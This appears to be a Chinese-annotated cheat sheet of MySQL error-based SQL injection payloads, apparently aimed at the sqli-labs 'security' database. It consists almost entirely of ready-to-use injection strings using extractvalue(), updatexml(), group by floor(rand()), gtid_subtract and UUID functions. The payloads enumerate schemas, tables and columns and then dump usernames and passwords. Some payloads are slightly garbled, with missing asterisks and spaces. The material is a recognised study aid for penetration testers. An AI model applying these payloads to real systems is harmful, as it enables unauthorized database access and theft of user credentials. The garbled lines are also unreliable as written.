select gtid_subtract((select group_concat(schema_name) from information_schema.schemata),1);
uuid
uuid_to_bin()
1
SELECT*from table1 where id=-1unionselect1,UUID_TO_BIN((select group_concat(schema_name) from information_schema.schemata));
bin_to_uuid()
1
SELECT*from table1 where id=-1unionselect1,BIN_TO_UUID((select group_concat(schema_name) from information_schema.schemata));
join using()注列名
1
select*from(select*from table1 a join (select*from table1)b)c;
1
select*from(select*from table1 a join (select*from table1)b using(id))c;
1
select*from(select*from table1 a join (select*from table1)b using(id,value))c;
空间函数Geohash
version[5.7, ?)
ST_LatFromGeoHash
1
select ST_LongFromGeoHash(<payload>);
ST_LongFromGeoHash
1
select ST_LongFromGeoHash(<payload>);
ST_PointFromGeoHash
1
select ST_PointFromGeoHash(<payload>, 1);
xpath
extractvalue()
数据库
1
?id=1' and extractvalue(1, concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e))--+
数据表
1
?id=1' and extractvalue(1, concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e))--+
字段
1
?id=1' and extractvalue(1, concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e))--+
数据
1
?id=1' and extractvalue(1, concat(0x7e,(select concat(id,0x7e,username,0x7e,password) from security.users limit 7,1),0x7e))--+
updatexml()
数据库
1
?id=1' and updatexml(1, concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e),1)--+
数据表
1
?id=1' and updatexml(1, concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)--+
字段
1
?id=1' and updatexml(1, concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 3,1),0x7e),1)--+
数据
1
?id=1' and updatexml(1, concat(0x7e,(select concat(id,0x7e,username,0x7e,password) from security.users limit 7,1),0x7e),1)--+
group by floor
version 5.x
利用外键重复来产生报错,这个报错注入在mysql 8.x的版本中不存在。
数据库版本
1
?id=1' union select 1,count(),concat(0x7e,(select database()),0x7e,floor(rand(0)2))a from information_schema.schemata group by a--+
数据库
1
?id=1' union select 1,count(),concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e,floor(rand(0)2))a from information_schema.columns group by a--+
数据表
1
?id=1' union select 1,count(),concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e,floor(rand(0)2))a from information_schema.columns group by a--+
字段
1
?id=1' union select 1,count(),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 5,1),0x7e,floor(rand(0)2))a from information_schema.columns group by a--+
数据
1
?id=1' union select 1,count(),concat(0x7e,(select password from security.users limit 2,1),0x7e,floor(rand(0)2))a from information_schema.columns group by a--+
